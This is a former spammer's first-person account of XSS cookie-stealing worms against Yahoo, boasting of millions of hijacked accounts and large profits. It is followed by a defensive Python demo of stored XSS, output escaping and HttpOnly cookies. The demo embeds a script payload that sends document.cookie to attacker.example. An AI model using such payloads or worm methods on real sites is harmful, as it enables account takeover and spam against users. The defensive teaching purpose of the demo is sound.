The first time I remember reading about XSS was when the Samy worm was created on MySpace in 2005. In fact, I had actually used different XSS techniques to bypass MySpace’s filters during my operation.
Anyway, the first time I saw a Yahoo XSS was on another spammer’s landing page that was promoting a work-from-home program. My friend owned the program he was pushing and wanted me to check out his landing page and see how he was making $5,000/day. After investigating it for a few minutes, I saw that there was a bit of code loading from the domain yahoo.com. This was unusual, because there wasn’t any reason why any assets from yahoo.com should be loading. I captured the headers and saw that it linked back to hk.groups.yahoo.com or something similar. There was a forum on the page that was vulnerable to a persistent XSS attack. He was stealing Yahoo users’ session cookies and sending mail with them.
After understanding the intricacies of this operation, I wasn’t too surprised that he was clearing $5,000/day. Within the hour, I had found the injection point and injected my own code into the vulnerable Yahoo forum. Now, when you steal a user’s session cookie, you don’t need their login credentials: no email, no password, nothing. You are already logged into their account by having their cookie. The worm was fairly simple: grab the user’s cookie, hit mail.yahoo.com, and send mail to everyone in their address book. Once users read the email and visited the website linked in it, it would grab their cookie and go through the process all over again. Yahoo killed the vulnerable website in just a couple of days, but not before I had made close to $30,000.
For me, hacking and spamming are a high that can’t be replicated. Over the next year, I would go on to find more XSS exploits, once again playing cat and mouse with Yahoo’s security team. The most infamous XSS exploit that I found was on the Yahoo developer blog. It was a publicly known exploit, but for me it was a chance to slap Yahoo in the face. Now, I didn’t necessarily have a grudge against Yahoo, but at the time they were offering security researchers a $12.50 voucher to their store for these same exploits that put every user on Yahoo at risk.
On this particular XSS vulnerability and worm, I hacked over 5 million accounts and sent over 25 million emails in a 3-day period. At the peak of this worm I was making $1,000 every 10 minutes. I was promoting a work-from-home program that paid $100 per sign-up, and I accumulated over 2,500 sales; do the math on that one. This caused havoc for Yahoo and eventually led them to change the way they stored cookies.
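The two technical points in the story above, a forum that rendered posted text unescaped so a stored script could read every reader’s session cookie, and Yahoo later changing how it stored cookies, as an added Python example. This is illustrative code written for this page; it is not Yahoo’s code and not the author’s worm. The stored post, the collection host attacker.example, the cookie name `session` and the session value are all constructed for the demo.

```python
"""Persistent XSS in a forum post, the escaped rendering that defuses it,
and an HttpOnly session cookie that keeps a surviving injection from
reading the session. Added example; not Yahoo's code nor the author's."""
import html
import re
from http.cookies import SimpleCookie

# Constructed sample post: the classic cookie-exfiltration payload an
# attacker would store in a forum that echoes post bodies unescaped.
# attacker.example is a placeholder hostname, not a real collection server.
STORED_POST = (
    "Great program, check it out!"
    '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'
)


def render_post_vulnerable(body: str) -> str:
    """Render a stored post by concatenating the raw body into the page.
    Whatever the poster wrote, script tags included, reaches every reader."""
    return '<div class="post">' + body + "</div>"


def render_post_safe(body: str) -> str:
    """Same rendering, but the body is HTML-escaped for an element context.
    quote=True also escapes quotes so the text cannot break out of an attribute
    if this helper is ever reused inside one."""
    return '<div class="post">' + html.escape(body, quote=True) + "</div>"


_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def executes_script(rendered: str) -> bool:
    """Rough check for this demo only: does the rendered page still carry an
    unescaped <script ...> tag that a browser would execute?"""
    return _SCRIPT_TAG.search(rendered) is not None


def session_cookie_header(session_id: str, http_only: bool = True) -> str:
    """Build the Set-Cookie value for a session cookie.

    With http_only=True the browser never exposes the cookie through
    document.cookie, so an XSS payload that does run cannot ship the session
    to the attacker. Secure and SameSite=Lax are defence in depth; none of
    these flags is a substitute for escaping output in the first place."""
    jar = SimpleCookie()
    jar["session"] = session_id
    morsel = jar["session"]
    morsel["path"] = "/"
    morsel["secure"] = True
    morsel["samesite"] = "Lax"
    if http_only:
        morsel["httponly"] = True
    return morsel.OutputString()


def cookie_readable_by_script(set_cookie: str) -> bool:
    """Mirror the browser rule: document.cookie omits HttpOnly cookies."""
    return "httponly" not in set_cookie.lower()


if __name__ == "__main__":
    for label, render in (("vulnerable", render_post_vulnerable),
                          ("escaped", render_post_safe)):
        page = render(STORED_POST)
        print(f"{label:10s} script executes: {executes_script(page)}")
    for flag in (False, True):
        header = session_cookie_header("s3ss10n", http_only=flag)
        print(f"HttpOnly={str(flag):5s} {header}  "
              f"readable by script: {cookie_readable_by_script(header)}")
```

Escaping is the fix for the forum itself; the HttpOnly flag is what limits the blast radius when an injection slips through, because a payload that still executes can send mail from the victim’s open session but can no longer copy the cookie out to reuse elsewhere.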
Here are a couple of articles detailing the exploits: